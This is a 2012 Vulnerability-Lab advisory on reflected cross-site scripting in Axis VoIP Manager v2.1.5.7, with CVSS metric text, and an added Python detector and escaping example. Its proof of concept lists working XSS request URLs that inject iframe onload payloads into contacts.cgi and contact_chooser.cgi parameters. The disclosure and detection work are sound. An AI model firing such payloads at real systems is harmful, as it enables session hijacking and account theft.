The vulnerable system is bound to the network stack and the set of possible attackers extends beyond the other options listed below, up to and including the entire Internet. Such a vulnerability is often termed “remotely exploitable” and can be thought of as an attack being exploitable at the protocol level one or more network hops away (e.g., across one or more routers). An example of a network attack is an attacker causing a denial of service by sending a specially crafted TCP packet across a wide area network (e.g., CVE-2004-0230).
Attack Complexity
Low
AC
The attacker must take no measurable action to exploit the vulnerability. The attack requires no target-specific circumvention to exploit the vulnerability. An attacker can expect repeatable success against the vulnerable system.
Privileges Required
Low
PR
The attacker requires privileges that provide basic capabilities that are typically limited to settings and resources owned by a single low-privileged user. Alternatively, an attacker with Low privileges has the ability to access only non-sensitive resources.
User Interaction
None
UI
The vulnerable system can be exploited without interaction from any human user, other than the attacker. Examples include: a remote attacker is able to send packets to a target system; a locally authenticated attacker executes code to elevate privileges.
Scope
Unchanged
S
An exploited vulnerability can only affect resources managed by the same security authority. In the case of a vulnerability in a virtualized environment, an exploited vulnerability in one guest instance would not affect neighboring guest instances.
Confidentiality
Low
C
There is some impact on confidentiality, but the attacker either does not gain control of any data, or the information obtained does not have a significant impact on the system or its operations.
Integrity
Low
I
Modification of data is possible, but the attacker does not have control over what can be modified, or the extent of what the attacker can affect is limited. The data modified does not have a direct, serious impact on the system.
Availability
Low
A
There is reduced performance or interruptions in resource availability. However, the attacker does not have the ability to completely prevent access to the resources or services; the impact is limited.
Title:
======
Axis VoIP Manager v2.1.5.7 - Multiple Web Vulnerabilities
Date:
=====
2012-09-09
References:
===========
http://www.vulnerability-lab.com/get_content.php?id=686
VL-ID:
=====
686
Common Vulnerability Scoring System:
====================================
2.3
Introduction:
=============
Feel free to create Schedules (in PBX Features), Inbound Routes, User Extensions (individually or using
Bulk Generator in Extensions & Directory), Feature Dial Codes (in PBX Features -> Feature Dial Codes),
IVR Menus (in PBX Features), ACD Queues, etc.
(Copy of the Vendor Homepage: http://www.axint.net/voip/ )
Abstract:
=========
The Vulnerability Laboratory Research Team discovered multiple cross site scripting vulnerabilities in the Axis VoIP
Manager v2.1.5.7.
Report-Timeline:
================
2011-09-07: Public Disclosure
Status:
========
Unpublished
Affected Products:
==================
Axis
Product: VoIP Manager v2.1.5.7
Exploitation-Technique:
=======================
Remote
Severity:
=========
Medium
Details:
========
Multiple non-persistent cross site scripting vulnerabilities are detected in the Axis VoIP Manager User Portal v2.1.5.7.
The vulnerability allows remote attackers to hijack website customer, moderator or admin sessions with medium or high
required user interaction. The bugs are located on the client side in the contact_chooser.cgi and contacts.cgi files,
with the bound vulnerable lastname, firstname, department, contact or managed_usr application parameters. Successful
exploitation results in application account theft, client-side phishing & client-side content request manipulation.
Exploitation requires medium or high user interaction and no privileged web application user account.
Vulnerable Module(s):
[+] contact_chooser.cgi
[+] contacts.cgi
Vulnerable Parameter(s):
[+] lastname, firstname & department
[+] contact
[+] managed_usr
Proof of Concept:
=================
The client-side cross site scripting vulnerabilities can be exploited by remote attackers with medium or high required
user interaction and without a privileged application user account. For demonstration or reproduce ...
Selection Filter
https://voip01.127.0.0.1:5999/asterisk/contacts.cgi?usr=demo-100&type=1&type_selector=2&lastname=&lastname_match=1&firstname=&firstname_match=1&department=%22%3E%3Ciframe%20src=a%20onload=alert%28%22HI%22%29%20%3C&department_match=1&action=Select
https://voip01.127.0.0.1:5999/asterisk/contacts.cgi?usr=demo-100&type=1&type_selector=2&lastname=&lastname_match=1&firstname=%22%3E%3Ciframe%20src=a%20onload=alert%28%22HI%22%29%20%3C&firstname_match=1&department=&department_match=1&action=Select
https://voip01.127.0.0.1:5999/asterisk/contacts.cgi?usr=demo-100&type=1&type_selector=2&lastname=%22%3E%3Ciframe%20src=a%20onload=alert%28%22HI%22%29%20%3C&lastname_match=1&firstname=&firstname_match=1&department=&department_match=1&action=Select
Contact Chooser
https://voip01.127.0.0.1:5999/asterisk/contact_chooser.cgi?contact=%22%3E%3Ciframe%20src=a%20onload=alert%28%22HI%22%29%20%3C
managed_usr - listing
https://voip01.127.0.0.1:5999/asterisk/contacts.cgi?type=2&usr=demo-100&managed_usr=%22%3E%3Ciframe%20src=a%20onload=alert%28%22HI%22%29%20%3C&type_selector=2&lastname=&lastname_match=1&firstname=&firstname_match=1&department=&department_match=1&action=Select+
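Added example (not part of the original advisory and not the vendor's code): a log-review check that flags requests to
the two affected modules whose listed parameters decode to HTML metacharacters, plus the attribute-context encoding that
neutralises the reflection. The sample request targets are constructed, and the <input> markup in render_attr is an
assumption about how the value is echoed back.

```python
import html
from urllib.parse import urlsplit, parse_qsl

# Modules and parameters named in the advisory.
WATCHED = {
    "contacts.cgi": {"lastname", "firstname", "department", "managed_usr"},
    "contact_chooser.cgi": {"contact"},
}
# Characters that close a double-quoted attribute or open/close a tag.
MARKUP = set('<>"')


def suspicious_params(request_target):
    """Return [(param, decoded_value)] for watched params carrying markup."""
    parts = urlsplit(request_target)
    script = parts.path.rsplit("/", 1)[-1]
    watched = WATCHED.get(script, set())
    hits = []
    # parse_qsl percent-decodes once, as the CGI layer would before reflecting.
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        if name in watched and MARKUP & set(value):
            hits.append((name, value))
    return hits


def render_attr(value):
    """Hardened reflection: encode the value for an HTML attribute context.

    The <input> element is an assumed template, used only for illustration.
    """
    return '<input name="department" value="%s">' % html.escape(value, quote=True)


# Constructed sample request targets (not taken from real logs).
SAMPLES = [
    "/asterisk/contacts.cgi?usr=demo-100&type=1&lastname=Smith&department=Sales&action=Select",
    "/asterisk/contacts.cgi?usr=demo-100&department=%22%3E%3Cb%3Etest&action=Select",
    "/asterisk/contact_chooser.cgi?contact=%22%3E%3Cb%3Etest",
    "/asterisk/other.cgi?contact=%22%3E%3Cb%3Etest",  # module not in the advisory
]

if __name__ == "__main__":
    for target in SAMPLES:
        print(target, "->", suspicious_params(target))
    print(render_attr('"><b>test'))
```

Run it over the request targets from the web server's access log; a hit means the request carried markup in a
parameter the advisory lists, not that the response was actually rendered in a victim's browser.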
Risk:
=====
The security risk of the non-persistent (client-side) cross site scripting vulnerabilities is estimated as
low(+)|(-)medium.
Credits:
========
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm () vulnerability-lab com)
Disclaimer:
===========
The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all
warranties, either expressed or implied, including the warranties of merchantability and capability for a particular
purpose. Vulnerability-Lab or its suppliers are not liable in any case of damage, including direct, indirect,
incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have
been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for
consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody
to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material.
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.vulnerability-lab.com/register
Contact: admin () vulnerability-lab com - support () vulnerability-lab com - research () vulnerability-lab com
Section: video.vulnerability-lab.com - forum.vulnerability-lab.com - news.vulnerability-lab.com
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability
Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights,
including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures,
texts, advisories, sourcecode, videos and other information on this website is trademark of vulnerability-lab team &
the specific authors or managers. To record, list (feed), modify, use or edit our material contact
(admin () vulnerability-lab com or support () vulnerability-lab com) to get a permission.
Copyright 2012 | Vulnerability Laboratory